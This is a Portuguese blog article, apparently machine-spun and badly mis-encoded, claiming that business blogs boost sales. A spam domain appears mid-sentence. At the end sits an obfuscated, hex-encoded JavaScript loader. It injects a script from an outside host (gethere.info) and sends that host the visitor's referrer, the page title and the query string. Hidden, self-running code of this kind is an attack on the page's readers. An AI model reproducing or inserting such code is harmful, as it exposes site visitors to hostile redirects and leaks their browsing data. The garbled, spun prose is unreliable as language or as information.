Blog

Blogues E Vendas: Uma Parceria De Empreendimento Perfeito ?

Como vocA? pode supor, uma de principais razA�es pelas quais as companhias consideram os blogs eficientes como ferramentas de negA?cios A� de que elas auxiliam a ocasionar ou promover as vendas. Embora nA?o haja um valor quantitativo com relaA�A?o A� influA?ncia monetA?ria exata dos blogues sobre as vendas, existe evidA?ncias por algum gA�nero de retorno sobre o investimento. O aumento nas vendas tA?m a possibilidade de ser e geralmente A� especialmente um dos efeitos indiretos dos blogs de sucesso.

Blogs – bom para os negA?cios

Imagine sentar em frente ao seu computador usando milhA�es de pessoas (acionistas, parceiros de negA?cios, concorrentes, funcionA?rios e a mA�dia) conversando sobre negA?cios e afins. Actualmente imagine se vocA? tA?m a possibilidade de usar todas as informaA�A�es que vocA? aprendeu para estabelecer o produto ou serviA�o de que seus clientes querem, por que eles querem, saiba como eles querem e quanto eles estA?o dispostos a pagar portanto. Isto foi precisamente o que A� um blogue e bastante mais. Definitivamente, os blogues sA?o bons para as empresas.

Um blog ou um blog foi um sitio interativo que mantA�m uma crA?nica contA�nua de informaA�A�es. A� um site atualizado regularmente usando links para outros artigos ou outros sites. Geralmente, um blog tende a ter uma A?rea por conteA?do primA?rio com artigos chamados postagens ou entradas listadas em ordem cronolA?gica inversa usando as ainda mais recentes pelo topo. Usualmente, esses artigos sA?o organizados em categorias. HA? tambA�m igualmente similarmente identicamente conjuntamente um arquivo de artigos baseado em datas. Um blogroll, uma lista do links para outros sitios relacionados A� especialmente outra caracterA�stica de 1 blog.

Um blog pode atalhar um ou mais feeds. A maioria dos blogs publica feeds (RSS, RDF, Atom). Um feed A� um conteA?do legA�vel por mA?quina que A� especialmente atualizado periodicamente. Um italianinterior.kz leitor de feeds exibe a nova postagem e um link para ela. A maioria dos blogs tambA�m tem um refugio que permite aos visitantes deixar comentA?rios. Com 1 blog, vocA? publica novos conteA?dos e seus leitores podem juntar seus prA?prios comentA?rios com links para seus prA?prios blogs. FA?cil de usar ferramentas por blogs estA?o disponA�veis, imensas vezes de graA�a. Uma ferramenta bA?sica por blogging fornece uma interface onde o visitante pode funcionar de forma fA?cil e intuitiva como cuida do restante da logA�stica envolvida em tornar seu blog apresentA?vel e disponA�vel para o pA?blico.

Blogar, criar ou manter 1 blog foi uma das A?reas por rA?pido crescimento da Net. De pacto com o popular motor de parecer Technorati, existem mais por 40 milhA�es de blogs na Net hoje em dia e mais blogues estA?o aparecendo na taxa de 75. 000 por dia. Isto A� especialmente principalmente por motivos de aos inA?meros benefA�cios de blogs para negA?cios.

Um blogue tem uma poderosa propriedade de marketing para expandir seus negA?cios, seja ele pequeno ou grande. Agora vocA? pode vir a ter uma presenA�a dominante na Web, nA?o baseada em tamanho, capital ou recursos, contudo baseada na qualidade de conteA?do, pA?blico-alvo e produtos e serviA�os A?teis. Usando blogs como equalizadores, a blogosfera se tornou 1 campo de jogo verdadeiramente estimulante para todas as empresas.

Um blog A� uma fonte repetida de informaA�A�es valiosas e atualizadas. A criaA�A?o por um blog permite de que vocA? demonstre sua experiA?ncia e se estabeleA�a como um lA�der de teorias em seu setor. Um blog pode ser seu veA�culo para atualizaA�A�es de produtos ou serviA�os, notA�cias da empresa e qualquer outra informaA�A?o de que vocA? queira transmitir ao seu pA?blico-alvo. Um blogue deve reprimir informaA�A�es relevantes, nA?o apenas arremessos do vendas; caso contrA?rio, foi muito menos provA?vel de que os leitores retornem. Tais como acontece usando qualquer parcela de um plano de marketing da empresa, um blog deve conter informaA�A�es que atraiam seu pA?blico-alvo.

Um blog A� um mA�todo eficaz para se comunicar com clientes e prospects. Ele permite que vocA? converse abertamente e regularmente com eles, aumentando a credibilidade, criando confianA�a e formando relacionamentos usando eles a partir de o inA�cio. Um blogue com seu estilo do conversaA�A?o A� ideal para desenvolver bons relacionamentos usando os clientes. Os leitores sentir-se-A?o A� vontade consigo bastante antes de telefonarem-lhe para fazer uma compra ou aproveitar o seu serviA�o.

Um blog A� uma A?tima ferramenta para obter feedback destes leitores. Seus leitores podem deixar comentA?rios ou criar perguntas. Um blog foi uma A?tima maneira por descobrir este que os leitores estA?o pensando e no desenvolvimento fornece idA�ias ou como melhor atendA?-los, melhorando assim o seu negA?cio. Formar decisA�es de negA?cios usando base nos feedbacks dos leitores pode ser 1 dos movimentos mais inteligentes que o visitante pode criar.

Ainda assim, para ser eficaz, 1 blog possui que ser atualizado usando freqA?A?ncia. Os leitores nA?o visitam blogues que nA?o apresentam novos conteA?dos regularmente. Manter os leitores informados com postagens periA?dicas a respeito de o seu negA?cio cria buzz e publicidade. HA? trabalho envolvido na criaA�A?o de um blog. Leva tempo e compromisso para escrever posts interessantes e informativos. Mas pode ser bem gasto, especialmente se ajudar a gerar vendas.

Blogues e Vendas Em Tandem

As vendas pedem interaA�A?o pessoal. Um blogue A� 1 desses lugares onde a comunicaA�A?o atravA�s de conversas prospera e os relacionamentos sA?o fomentados. Quando vocA? dA? aos seus leitores informaA�A�es importantes de que eles podem usar atravA�s do seu blog de forma consistente, eles ficarA?o satisfeitos. Em seguida, eles retornarA?o para mais conteA?do recente regularmente. Horas extras, o visitante serA? pesado de construir um pA?blico fiel. Estes leitores vA?o vA?-lo como um especialista em seu nicho especA�fico. Seus leitores vA?o confiar em vocA? e um relacionamento A� progredido. Seus leitores perceberA?o de que A� menos arriscado adquirir de vocA? ou aproveitar seu serviA�o. Se vocA? pode blogar eficientemente sobre o assunto, eles tendem a confiar que seu produto ou serviA�o valerA? a pena.

Ao blogar, o visitante estA? enviando a recado de que alguA�m estA? ouvindo, alguA�m de que vocA? pode abordar saiba como pode ser visto a partir do comentA?rios respondidos e novas atualizaA�A�es. Isso farA? com que seus leitores se sintam ainda mais seguros e levarA? isso em lado, pois eles tomam uma decisA?o do compra. Este blog A� inerentemente uma conversa contA�nua que, a longo prazo, gera confianA�a e lealdade e proporciona familiaridade. Quando eles se tornarem clientes satisfeitos, eles virA?o atA� vocA? para obter mais informaA�A�es e, se receberem a opA�A?o, desejarA?o comprar de vocA?. Isso fortalece o relacionamento entre o visitante e seus clientes e eles igualmente podem enviar outras vendas para o visitante. O ciclo continua. AlA�m disso, 1 blog A� especialmente uma maneira extremamente eficiente para adquirir um ranking elevado do Search Engine. Em outras palavras, estes blogs podem trazer muito mais leitores e mais compradores em potencial.

Blogar foi marketing para as pessoas por uma maneira menos intrusiva e ofensiva, mais saiba como uma conversa freewheeling em comparaA�A?o usando um discurso de vendas irritante. A� especialmente realmente uma boa maneira de promover as vendas, ainda de que indiretamente.

var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}